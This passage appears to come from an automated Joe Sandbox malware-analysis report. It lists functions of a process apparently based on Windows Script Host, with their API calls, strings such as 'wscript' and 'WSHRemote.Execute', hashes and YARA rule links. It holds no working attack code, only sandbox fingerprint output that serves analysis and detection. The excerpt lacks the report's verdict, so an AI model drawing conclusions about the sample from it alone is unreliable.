SysStringLen.OLEAUT32 ref: 00007FF7C0B9FFCE
VariantClear.OLEAUT32 ref: 00007FF7C0B9FFF3
VariantClear.OLEAUT32 ref: 00007FF7C0BA0022

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: Variant$ClearString$ArrayElementInitSafe
String ID:
API String ID: 598207039-0
Opcode ID: fc6accf0ca07252a161a9e0eeccae8e2b3bdb484962d130f295bf7465759c3a7
Instruction ID: ba0de9b61f9060b249e88edcdba3f081bf55c1e41651bdefa1967992ca1f1e17
Opcode Fuzzy Hash: fc6accf0ca07252a161a9e0eeccae8e2b3bdb484962d130f295bf7465759c3a7
Instruction Fuzzy Hash: 8721A432B146569AEB15EF75DC901AC67A0FB48BB4B400131DE1FC3B94EF38E45587A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA2E48, Relevance: 9.1, APIs: 6, Instructions: 56filelibraryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF7C0BA2E7C
CreateFileMappingW.KERNEL32 ref: 00007FF7C0BA2EA4
CloseHandle.KERNEL32 ref: 00007FF7C0BA2EB0
MapViewOfFile.KERNEL32 ref: 00007FF7C0BA2ECD
CloseHandle.KERNEL32 ref: 00007FF7C0BA2ED9
LoadLibraryExW.KERNEL32(?,?,?,?,?,?,00000000,00007FF7C0BA37B3), ref: 00007FF7C0BA2EF8

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: File$CloseCreateHandle$LibraryLoadMappingView
String ID:
API String ID: 1262414356-0
Opcode ID: a8ea74e203072a946b60277a75e21a3c64d52ca64d2564570eecd41b789403e6
Instruction ID: ab9422f826e6f54c5fb3cfdd543eb2fb46f676e15cc04cdcfe96ddc747953043
Opcode Fuzzy Hash: a8ea74e203072a946b60277a75e21a3c64d52ca64d2564570eecd41b789403e6
Instruction Fuzzy Hash: 3211C331B18B5282E761EF15ED04629E661AB84FF0F988235CA1A83F94CF3CB4628750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B91290, Relevance: 9.1, APIs: 6, Instructions: 54threadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF7C0B912AE
SysFreeString.OLEAUT32 ref: 00007FF7C0B912CB
SysFreeString.OLEAUT32 ref: 00007FF7C0B912D5
SysFreeString.OLEAUT32 ref: 00007FF7C0B912DF
RtlDeleteCriticalSection.NTDLL ref: 00007FF7C0B9132E
PostThreadMessageA.USER32 ref: 00007FF7C0B91350

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: FreeString$Thread$CriticalCurrentDeleteMessagePostSection
String ID:
API String ID: 1408622836-0
Opcode ID: a520bd929c661e741c0b713eee506af4929aee8b9f0700b317503e5ccd92e35e
Instruction ID: 3b2f81c7a75ae5f7b25fa3e6daa7866f55a14c7dc26859f224950e9e26f91db0
Opcode Fuzzy Hash: a520bd929c661e741c0b713eee506af4929aee8b9f0700b317503e5ccd92e35e
Instruction Fuzzy Hash: E721FF76A09A4292EB56EF65DC94128A370FF88F65B944431CA0F83764CF3CE456C3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B95848, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0B931F4: _vsnprintf.MSVCRT ref: 00007FF7C0B93231

RegOpenKeyExA.ADVAPI32 ref: 00007FF7C0B958B6
RegCreateKeyA.ADVAPI32 ref: 00007FF7C0B958D1
RegCloseKey.ADVAPI32 ref: 00007FF7C0B95908

Strings

SOFTWARE\Classes\%s\%s, xrefs: 00007FF7C0B95883
Shell, xrefs: 00007FF7C0B9586A

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CloseCreateOpen_vsnprintf
String ID: SOFTWARE\Classes\%s\%s$Shell
API String ID: 476925587-2614410927
Opcode ID: 5433c403d3cad10f16ce353cd70ae7a2d7c77152a449c57470574e65f349357d
Instruction ID: 0ab93d7d0e64bce538e3df9c15e0fbf4be01a72a11db9d1ecd5bd95a0e21691b
Opcode Fuzzy Hash: 5433c403d3cad10f16ce353cd70ae7a2d7c77152a449c57470574e65f349357d
Instruction Fuzzy Hash: 0A216521718B8281EB11EF65EC947A7A3A0FB887A4FC00131EA5EC7794DF2CE514C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA18F0, Relevance: 7.6, APIs: 5, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF7C0B9D358), ref: 00007FF7C0BA193F
WideCharToMultiByte.KERNEL32 ref: 00007FF7C0BA1975
GetLastError.KERNEL32 ref: 00007FF7C0BA1982

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ByteCharErrorLastMultiValueWide
String ID:
API String ID: 2367157299-0
Opcode ID: 465d2811773bb182646a5ff97fecd1111c80a7d09266cef83a9775a224eb1e8e
Instruction ID: c4d719a2f7b010d74900dfc5695f962d9594de78b98b4fdbbc7a255d922ff9c9
Opcode Fuzzy Hash: 465d2811773bb182646a5ff97fecd1111c80a7d09266cef83a9775a224eb1e8e
Instruction Fuzzy Hash: F731C932614B8185E760DF21A85037AA394FB487B8F840335EA5E86BD4CF3CE1658750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9B7A0, Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00007FF7C0B9B7D0
MsgWaitForMultipleObjectsEx.USER32 ref: 00007FF7C0B9B824
PeekMessageA.USER32 ref: 00007FF7C0B9B83F
DispatchMessageA.USER32 ref: 00007FF7C0B9B84E
GetTickCount.KERNEL32 ref: 00007FF7C0B9B866

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CountMessageTick$DispatchMultipleObjectsPeekWait
String ID:
API String ID: 4276921731-0
Opcode ID: 2b6174533ec8748a5d02c06003e4b154ca2dc3091372daa0d389b673074a00e1
Instruction ID: 9f4fbc8d3ec30cc6f15fb3b4e6c73d015b68311484901d8fa5d6f2ab7dcdef6d
Opcode Fuzzy Hash: 2b6174533ec8748a5d02c06003e4b154ca2dc3091372daa0d389b673074a00e1
Instruction Fuzzy Hash: 2D21F821F24A4186E312EF35984476AA2A5BF9C794F45C335DA4FE3710DF38E4578790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9ABA0, Relevance: 7.6, APIs: 5, Instructions: 60windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00007FF7C0B9ABC4
GetClassNameA.USER32 ref: 00007FF7C0B9ABE8
GetParent.USER32 ref: 00007FF7C0B9AC1B
PostMessageA.USER32 ref: 00007FF7C0B9AC36
PostMessageA.USER32 ref: 00007FF7C0B9AC4B

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: MessagePost$ClassNameParentVisibleWindow
String ID:
API String ID: 1155528767-0
Opcode ID: d2cd9adbc0aeab92bbf37f732a4f9e168fa5aaffa090aa96134ed03ba59b53aa
Instruction ID: 4e392a9237235483bd06678eb6e71b4eebbe08ec45fe1c4539b34c9554388233
Opcode Fuzzy Hash: d2cd9adbc0aeab92bbf37f732a4f9e168fa5aaffa090aa96134ed03ba59b53aa
Instruction Fuzzy Hash: FA21B621A0C68242EB61EF25AC1037AE770EF457E4F841030D98E5BB54DF2CF8528BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9DBEC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

wcscpy_s.MSVCRT ref: 00007FF7C0B9DC9C
wcscpy_s.MSVCRT ref: 00007FF7C0B9DCDF
SysFreeString.OLEAUT32 ref: 00007FF7C0B9DD74

Strings

WSH, xrefs: 00007FF7C0B9DCC0

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: wcscpy_s$FreeString
String ID: WSH
API String ID: 4021863947-2133009938
Opcode ID: 9c83da4f9e73a92d67dbac18e40294876c6c2d665ebb01c5f6b54aaa8719328a
Instruction ID: 24740b1076480433fe603220fe715c4fa6f620d75434043f50e98d6024b2bc9b
Opcode Fuzzy Hash: 9c83da4f9e73a92d67dbac18e40294876c6c2d665ebb01c5f6b54aaa8719328a
Instruction Fuzzy Hash: 0F516321618A5681EE21EF26DC40169A370FF84BF5F944232DA5E877A5CF3DF451C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B964DC, Relevance: 6.1, APIs: 4, Instructions: 120COMMON

Download Yara Rule

APIs

CreateErrorInfo.OLEAUT32 ref: 00007FF7C0B96515
SetErrorInfo.OLEAUT32 ref: 00007FF7C0B96618
SysFreeString.OLEAUT32 ref: 00007FF7C0B9664F
SysFreeString.OLEAUT32 ref: 00007FF7C0B96658

Part of subcall function 00007FF7C0BA09CC: LoadStringW.USER32 ref: 00007FF7C0BA0A16
Part of subcall function 00007FF7C0BA09CC: SysAllocString.OLEAUT32 ref: 00007FF7C0BA0A63

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: String$ErrorFreeInfo$AllocCreateLoad
String ID:
API String ID: 3761032807-0
Opcode ID: dc582211c869ebc6f38f02b8025d36d86266f469f7dfea9eef448f75d2a3ffcc
Instruction ID: 677c6a36a1e5f01d0d3c0c404101acbd5dfb50671e8905d93a71be281cc232e6
Opcode Fuzzy Hash: dc582211c869ebc6f38f02b8025d36d86266f469f7dfea9eef448f75d2a3ffcc
Instruction Fuzzy Hash: 90512F26B14A6686EB05DF66DC802AD6B74BB48FE8F404431DE0ED7B64DF38E455C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9E4C8, Relevance: 6.1, APIs: 4, Instructions: 119memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0BA3B74: _malloc_dbg.MSVCRT ref: 00007FF7C0BA3B92

SafeArrayCreate.OLEAUT32 ref: 00007FF7C0B9E5CE
SysAllocString.OLEAUT32 ref: 00007FF7C0B9E603
SafeArrayPutElement.OLEAUT32 ref: 00007FF7C0B9E621
VariantClear.OLEAUT32 ref: 00007FF7C0B9E62E

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ArraySafe$AllocClearCreateElementStringVariant_malloc_dbg
String ID:
API String ID: 1842264155-0
Opcode ID: e9030f3e4b5bd63d7a906b22d24acdd081fd9caac9cf571c1f07528e9698edb3
Instruction ID: 95c4c242e7e48141fc3282f76775198894b2188d183623935bd22c3b77c0e81c
Opcode Fuzzy Hash: e9030f3e4b5bd63d7a906b22d24acdd081fd9caac9cf571c1f07528e9698edb3
Instruction Fuzzy Hash: 11519E72A08B4286E711DF24E840369B3B0FB58B68F950135DA4E87768EF3CE555C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA00AC, Relevance: 6.1, APIs: 4, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0BA3B74: _malloc_dbg.MSVCRT ref: 00007FF7C0BA3B92

SafeArrayCreate.OLEAUT32 ref: 00007FF7C0BA018C
SysAllocString.OLEAUT32 ref: 00007FF7C0BA01C9
SafeArrayPutElement.OLEAUT32 ref: 00007FF7C0BA01EA
VariantClear.OLEAUT32 ref: 00007FF7C0BA01F7

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ArraySafe$AllocClearCreateElementStringVariant_malloc_dbg
String ID:
API String ID: 1842264155-0
Opcode ID: d299a61cbf46e01fe73576e71a2fed35a2251391d1c16dd6266a7be152351c4b
Instruction ID: 12f39745ec55adbfe7cd801d0a49c06ecebcc72ad09df92dee80a0b95959df04
Opcode Fuzzy Hash: d299a61cbf46e01fe73576e71a2fed35a2251391d1c16dd6266a7be152351c4b
Instruction Fuzzy Hash: EA519172619B4296E762DF15E9803A9B3A0FB48760F804135DA4E83B50EF3CF5B5C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA3BD0, Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7C0BA3D13
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7C0BA3D32
RtlVirtualUnwind.KERNEL32 ref: 00007FF7C0BA3D7F
__raise_securityfailure.LIBCMT ref: 00007FF7C0BA3E64

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: fc5f688f5c065cb11c9ffca66ac3baa33a6afb08402088b8e1f511e0a50bb0f2
Instruction ID: c0f51afa9f0245378549c1a44807f6f751e5ec602e2fc167894e23d828d2cc2f
Opcode Fuzzy Hash: fc5f688f5c065cb11c9ffca66ac3baa33a6afb08402088b8e1f511e0a50bb0f2
Instruction Fuzzy Hash: 5441B839609B1285EB11EF48FC903A5B3A4FB88764FD04136E98E82764DF7DE564C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA3E74, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0BA1C98), ref: 00007FF7C0BA3E7F
RtlLookupFunctionEntry.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0BA1C98), ref: 00007FF7C0BA3E9E
RtlVirtualUnwind.KERNEL32 ref: 00007FF7C0BA3EEB
__raise_securityfailure.LIBCMT ref: 00007FF7C0BA3F61

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: 4869cafc389b2c3fb2770f120654123f393a292d05354995f560dc96cefc7251
Instruction ID: 55f51e31e0f5ddda2ac9ed70c3ac6e8df4ac704d5b6116db969c9e1518782463
Opcode Fuzzy Hash: 4869cafc389b2c3fb2770f120654123f393a292d05354995f560dc96cefc7251
Instruction Fuzzy Hash: 6F21A339909B1285EB01EF44FC803A9A3A4FB84764F900136EA8E83764DF7DE165C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B92BB0, Relevance: 6.0, APIs: 4, Instructions: 33windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0BA09CC: LoadStringW.USER32 ref: 00007FF7C0BA0A16
Part of subcall function 00007FF7C0BA09CC: SysAllocString.OLEAUT32 ref: 00007FF7C0BA0A63

Part of subcall function 00007FF7C0BA09CC: LoadStringA.USER32 ref: 00007FF7C0BA0A23
Part of subcall function 00007FF7C0BA09CC: MultiByteToWideChar.KERNEL32 ref: 00007FF7C0BA0A4F

GetActiveWindow.USER32 ref: 00007FF7C0B92BFF
MessageBoxW.USER32 ref: 00007FF7C0B92C16
SysFreeString.OLEAUT32 ref: 00007FF7C0B92C21
SysFreeString.OLEAUT32 ref: 00007FF7C0B92C2C

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: String$FreeLoad$ActiveAllocByteCharMessageMultiWideWindow
String ID:
API String ID: 2643037684-0
Opcode ID: fb29466f0502cde8b2ef41bd7dc3bb2b9fb55c6feac7a0b9f1fe3ad8ea4e7ca4
Instruction ID: c66a5b8044deb2c520530073b781cf6a59f28d58396c8ca46d0eefce00125575
Opcode Fuzzy Hash: fb29466f0502cde8b2ef41bd7dc3bb2b9fb55c6feac7a0b9f1fe3ad8ea4e7ca4
Instruction Fuzzy Hash: 3501406191864782EB42FF60EC8036AA770FB94765F901030D94F82755DF2CE8658BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9AAAC, Relevance: 6.0, APIs: 4, Instructions: 28windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32 ref: 00007FF7C0B9AAE9
MsgWaitForMultipleObjects.USER32 ref: 00007FF7C0B9AB0B

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: MessageMultipleObjectsPeekWait
String ID:
API String ID: 3986374578-0
Opcode ID: 4e0e757d067faf3c95b5bbc099de3210e0857e8a74d75ffd197bd8df6cc6fe89
Instruction ID: aefbd71e079e635b0495733e127b89edc26ac467442bc807b627ae5f216a79cc
Opcode Fuzzy Hash: 4e0e757d067faf3c95b5bbc099de3210e0857e8a74d75ffd197bd8df6cc6fe89
Instruction Fuzzy Hash: 35F03132E2854293EB60FF24EC54A69A661FF90334FD05235D19B81AD4DF3CE51ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9D670, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 356COMMON

Download Yara Rule

Strings

cscript, xrefs: 00007FF7C0B9D8B2
wscript, xrefs: 00007FF7C0B9D8F5

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID:
String ID: cscript$wscript
API String ID: 0-3774417012
Opcode ID: cb76350cea9e31c165af64c11842f7dd4bbc18e01eced5b20fb5aa31136ffada
Instruction ID: e53ecd217127cd87c110b7f4fd8933a19f721a1d5234a8cb81718c2347cf8103
Opcode Fuzzy Hash: cb76350cea9e31c165af64c11842f7dd4bbc18e01eced5b20fb5aa31136ffada
Instruction Fuzzy Hash: C6E1E72290C28285EF35EF26985017AE6B0EB41779F964235DA5F877D9CB3CF901C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B91F80, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF7C0B91F9B

Strings

wscript, xrefs: 00007FF7C0B92055

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CurrentThread
String ID: wscript
API String ID: 2882836952-434116418
Opcode ID: a904b209b09c7779b7f0d123877177c7efe453cd4cd34810e8214d5d51812d0f
Instruction ID: 4bfc755dd3a7493d0c7d5d759e758ac0f61afdcfc1ef35b53951054eb11256c9
Opcode Fuzzy Hash: a904b209b09c7779b7f0d123877177c7efe453cd4cd34810e8214d5d51812d0f
Instruction Fuzzy Hash: F7516E22A08B4242EA15EF21DD50379A3A0EF45BB4F844535DB0E977A5DF3CF465C3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B98B40, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00007FF7C0B98BD9

Strings

WScript, xrefs: 00007FF7C0B98B79
WSH, xrefs: 00007FF7C0B98B94

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ActiveWindow
String ID: WSH$WScript
API String ID: 2558294473-1019903269
Opcode ID: 1dfef353a55dc0303b0e82de307382898d7c27377db38ad579cf893b105a27eb
Instruction ID: a7ba4d8ce2ca0045ea5929f04d509dd64d3b48b96688004803eb9a917617d704
Opcode Fuzzy Hash: 1dfef353a55dc0303b0e82de307382898d7c27377db38ad579cf893b105a27eb
Instruction Fuzzy Hash: 151175A260868281E611EF69DC4013993B0EB44BB0F989231DE6EC77D4DF2DF451C354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B922C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF7C0B922C9

Strings

WSHRemote.Execute, xrefs: 00007FF7C0B92302, 00007FF7C0B92361

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
